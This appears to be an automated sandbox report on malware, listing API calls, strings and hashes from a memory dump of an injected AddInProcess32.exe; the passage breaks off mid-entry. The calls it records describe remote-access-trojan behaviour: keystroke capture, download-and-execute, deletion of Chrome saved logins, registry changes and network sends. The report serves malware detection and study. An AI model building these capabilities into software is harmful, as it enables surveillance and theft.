                                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$CreateFirstNext
                                        • String ID: 8SG$PXG$PXG$NG$PG
                                        • API String ID: 341183262-3812160132
                                        • Opcode ID: 5994fb28f0a65c682bf7e78567ac2feaa865d922d468e60f9a7c6d49d4d7ee90
                                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                        • Opcode Fuzzy Hash: 5994fb28f0a65c682bf7e78567ac2feaa865d922d468e60f9a7c6d49d4d7ee90
                                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                        • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                        • GetKeyState.USER32(00000010), ref: 0040A433
                                        • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                        • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                        • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                        • String ID:
                                        • API String ID: 1888522110-0
                                        • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                        • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                        • API String ID: 2127411465-314212984
                                        • Opcode ID: ec507b0493fd4fd584cfcadeaf977d3343d777ca479f652cc31a06200245f1e9
                                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                        • Opcode Fuzzy Hash: ec507b0493fd4fd584cfcadeaf977d3343d777ca479f652cc31a06200245f1e9
                                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                        APIs
                                        • _free.LIBCMT ref: 00449212
                                        • _free.LIBCMT ref: 00449236
                                        • _free.LIBCMT ref: 004493BD
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                        • _free.LIBCMT ref: 00449589
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                        • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                        APIs
                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                        • API String ID: 1589313981-2876530381
                                        • Opcode ID: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                        • Opcode Fuzzy Hash: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP$['E
                                        • API String ID: 2299586839-2532616801
                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                        • GetLastError.KERNEL32 ref: 0040BA58
                                        Strings
                                        • UserProfile, xrefs: 0040BA1E
                                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 2018770650-1062637481
                                        • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                        • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                        • GetLastError.KERNEL32 ref: 0041799D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00409258
                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                        • FindClose.KERNEL32(00000000), ref: 004093C1
                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                          • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                        • FindClose.KERNEL32(00000000), ref: 004095B9
                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                        • String ID:
                                        • API String ID: 1824512719-0
                                        • Opcode ID: b8615f818144c9de55a3c26363f6e9beaea89f970a6763e32edf7c6a920ea78d
                                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                        • Opcode Fuzzy Hash: b8615f818144c9de55a3c26363f6e9beaea89f970a6763e32edf7c6a920ea78d
                                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                        • String ID:
                                        • API String ID: 276877138-0
                                        • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                        • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                        • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                        • _wcschr.LIBVCRUNTIME ref: 00451E58
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                        • String ID: sJD
                                        • API String ID: 4212172061-3536923933
                                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                        APIs
                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040966A
                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstH_prologNext
                                        • String ID:
                                        • API String ID: 1157919129-0
                                        • Opcode ID: a63fc434628bc6551d32ba9ea463d8ae98ae71a2f16d0652880af83d60511800
                                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                        • Opcode Fuzzy Hash: a63fc434628bc6551d32ba9ea463d8ae98ae71a2f16d0652880af83d60511800
                                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00408811
                                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                        • String ID:
                                        • API String ID: 1771804793-0
                                        • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                        • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadExecuteFileShell
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                        • API String ID: 2825088817-2881483049
                                        • Opcode ID: b624b8a8e6d1afd2671f4c94f0cce130be9b70bf72b71bf2efbf22e14ea94f47
                                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                        • Opcode Fuzzy Hash: b624b8a8e6d1afd2671f4c94f0cce130be9b70bf72b71bf2efbf22e14ea94f47
                                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstNextsend
                                        • String ID: XPG$XPG
                                        • API String ID: 4113138495-1962359302
                                        • Opcode ID: d3180e536943687776c1a305522e73affd7289e0c4d22ffe546a90957f10fbe8
                                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                        • Opcode Fuzzy Hash: d3180e536943687776c1a305522e73affd7289e0c4d22ffe546a90957f10fbe8
                                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                        APIs
                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                          • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                          • Part of subcall function 0041376F: RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 4127273184-3576401099
                                        • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                        • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                        • String ID:
                                        • API String ID: 2829624132-0
                                        • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                        • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                        • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                        • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease
                                        • String ID:
                                        • API String ID: 1815803762-0
                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                        • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                        • ExitProcess.KERNEL32 ref: 004432EF
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
